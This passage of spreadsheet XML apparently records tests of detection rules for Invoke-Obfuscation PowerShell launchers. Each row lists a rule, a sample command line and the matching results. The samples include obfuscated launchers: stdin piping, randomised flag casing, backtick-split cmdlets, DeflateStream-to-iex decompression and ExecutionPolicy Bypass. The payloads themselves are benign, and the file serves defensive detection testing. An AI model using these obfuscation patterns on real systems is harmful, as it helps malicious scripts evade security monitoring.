          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E707" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "echo Write-Host 'Bypass' | powershell.exe -noprofile -command -"</t>
        </is>
      </c>
      <c r="F707" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G707" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H707" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I707" s="43" t="n"/>
      <c r="J707" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K707" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="708" ht="15.75" customHeight="1" s="42">
      <c r="A708" s="43" t="n"/>
      <c r="B708" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C708" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D708" s="36" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E708" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "echo Write-Host 'Bypass' | pwsh.exe -noexit -"</t>
        </is>
      </c>
      <c r="F708" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G708" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H708" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I708" s="43" t="n"/>
      <c r="J708" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K708" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="709" ht="15.75" customHeight="1" s="42">
      <c r="A709" s="43" t="n"/>
      <c r="B709" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C709" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D709" s="36" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E709" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "echo Write-Host 'Bypass' | pwsh.exe -noexit -"</t>
        </is>
      </c>
      <c r="F709" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G709" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H709" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I709" s="36" t="n"/>
      <c r="J709" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K709" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="710" ht="15.75" customHeight="1" s="42">
      <c r="A710" s="43" t="n"/>
      <c r="B710" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C710" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D710" s="36" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E710" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "echo 'Write-Host Bypass' | powershell.exe -noexit -"</t>
        </is>
      </c>
      <c r="F710" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G710" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H710" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I710" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher (6c96fc76-0eb1-11eb-adc1-0242ac120002)</t>
        </is>
      </c>
      <c r="J710" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K710" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="711" ht="15.75" customHeight="1" s="42">
      <c r="A711" s="43" t="n"/>
      <c r="B711" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C711" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D711" s="36" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E711" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -C "echo 'Write-Host Bypass' | powershell.exe -noexit -"</t>
        </is>
      </c>
      <c r="F711" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G711" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H711" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I711" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher (6c96fc76-0eb1-11eb-adc1-0242ac120002)</t>
        </is>
      </c>
      <c r="J711" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K711" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="712" ht="15.75" customHeight="1" s="42">
      <c r="A712" s="43" t="n"/>
      <c r="B712" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C712" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D712" s="36" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E712" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "echo 'Write-Host Bypass' | powershell.exe -noexit -"</t>
        </is>
      </c>
      <c r="F712" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G712" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H712" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I712" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher (6c96fc76-0eb1-11eb-adc1-0242ac120002)</t>
        </is>
      </c>
      <c r="J712" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K712" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="713" ht="15.75" customHeight="1" s="42">
      <c r="A713" s="43" t="n"/>
      <c r="B713" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C713" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D713" s="36" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E713" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F713" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G713" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H713" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I713" s="43" t="n"/>
      <c r="J713" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K713" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="714" ht="15.75" customHeight="1" s="42">
      <c r="A714" s="43" t="n"/>
      <c r="B714" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C714" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D714" s="36" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E714" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMaND "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F714" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G714" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H714" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I714" s="43" t="n"/>
      <c r="J714" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K714" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="715" ht="15.75" customHeight="1" s="42">
      <c r="A715" s="43" t="n"/>
      <c r="B715" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C715" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D715" s="36" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E715" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CommAnD "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F715" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G715" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H715" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I715" s="43" t="n"/>
      <c r="J715" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K715" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="716" ht="15.75" customHeight="1" s="42">
      <c r="A716" s="43" t="n"/>
      <c r="B716" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C716" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D716" s="36" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E716" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F716" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G716" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H716" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I716" s="43" t="n"/>
      <c r="J716" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K716" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="717" ht="15.75" customHeight="1" s="42">
      <c r="A717" s="43" t="n"/>
      <c r="B717" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C717" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D717" s="36" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E717" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMaNd "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F717" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G717" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H717" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I717" s="43" t="n"/>
      <c r="J717" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K717" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="718" ht="15.75" customHeight="1" s="42">
      <c r="A718" s="43" t="n"/>
      <c r="B718" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C718" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D718" s="36" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E718" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMmanD "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F718" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G718" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H718" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I718" s="43" t="n"/>
      <c r="J718" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K718" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="719" ht="15.75" customHeight="1" s="42">
      <c r="A719" s="43" t="n"/>
      <c r="B719" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C719" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D719" s="36" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E719" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmANd "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F719" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G719" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H719" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I719" s="43" t="n"/>
      <c r="J719" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K719" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="720" ht="15.75" customHeight="1" s="42">
      <c r="A720" s="43" t="n"/>
      <c r="B720" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C720" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D720" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E720" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F720" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G720" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H720" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I720" s="43" t="n"/>
      <c r="J720" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K720" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="721" ht="15.75" customHeight="1" s="42">
      <c r="A721" s="43" t="n"/>
      <c r="B721" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C721" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D721" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E721" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAnD "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F721" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G721" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H721" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I721" s="43" t="n"/>
      <c r="J721" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K721" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="722" ht="15.75" customHeight="1" s="42">
      <c r="A722" s="43" t="n"/>
      <c r="B722" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C722" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D722" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E722" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F722" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G722" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H722" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I722" s="43" t="n"/>
      <c r="J722" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K722" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="723" ht="15.75" customHeight="1" s="42">
      <c r="A723" s="43" t="n"/>
      <c r="B723" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C723" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D723" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E723" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmAnd "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F723" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G723" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H723" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I723" s="43" t="n"/>
      <c r="J723" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K723" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="724" ht="15.75" customHeight="1" s="42">
      <c r="A724" s="43" t="n"/>
      <c r="B724" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C724" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D724" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E724" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAND "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F724" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G724" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H724" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I724" s="43" t="n"/>
      <c r="J724" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K724" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="725" ht="15.75" customHeight="1" s="42">
      <c r="A725" s="43" t="n"/>
      <c r="B725" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C725" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D725" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E725" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMAND "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F725" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G725" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H725" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I725" s="43" t="n"/>
      <c r="J725" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K725" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="726" ht="15.75" customHeight="1" s="42">
      <c r="A726" s="43" t="n"/>
      <c r="B726" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C726" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D726" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E726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726" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G726" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H726" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I726" s="43" t="n"/>
      <c r="J726" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K726" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="727" ht="15.75" customHeight="1" s="42">
      <c r="A727" s="43" t="n"/>
      <c r="B727" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C727" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D727" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E727" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$stream = [System.IO.Compression.DeflateStream]::new($ms, 0); $reader = [System.IO.StreamReader]::new($stream, [System.Text.Encoding]::UTF8); iex $reader.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F727" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G727" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H727" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I727" s="43" t="n"/>
      <c r="J727" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K727" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="728" ht="15.75" customHeight="1" s="42">
      <c r="A728" s="43" t="n"/>
      <c r="B728" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C728" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D728" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E728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728" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G728" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H728" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I728" s="43" t="n"/>
      <c r="J728" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K728" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="729" ht="15.75" customHeight="1" s="42">
      <c r="A729" s="43" t="n"/>
      <c r="B729" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C729" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D729" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E729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729" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G729" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H729" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I729" s="43" t="n"/>
      <c r="J729" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K729" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="730" ht="15.75" customHeight="1" s="42">
      <c r="A730" s="43" t="n"/>
      <c r="B730" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C730" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D730" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E730" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "set A=in^voke &amp; set B=environment &amp; echo %A% | powershell -"</t>
        </is>
      </c>
      <c r="F730" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G730" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H730" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I730" s="36" t="n"/>
      <c r="J730" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K730" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="731" ht="15.75" customHeight="1" s="42">
      <c r="A731" s="43" t="n"/>
      <c r="B731" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C731" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D731" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E731" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F731" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G731" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H731" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I731" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J731" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K731" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="732" ht="15.75" customHeight="1" s="42">
      <c r="A732" s="43" t="n"/>
      <c r="B732" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C732" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D732" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E732" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -COmMANd "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F732" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G732" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H732" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I732" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J732" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K732" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="733" ht="15.75" customHeight="1" s="42">
      <c r="A733" s="43" t="n"/>
      <c r="B733" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C733" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D733" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E733" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -c "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F733" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G733" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H733" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I733" s="36" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J733" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K733" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="734" ht="15.75" customHeight="1" s="42">
      <c r="A734" s="43" t="n"/>
      <c r="B734" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C734" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D734" s="36" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E734" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExeCuTIoNpolIcy Bypass -CommANd "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F734" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G734" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H734" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I734" s="43" t="inlineStr">
        <is>
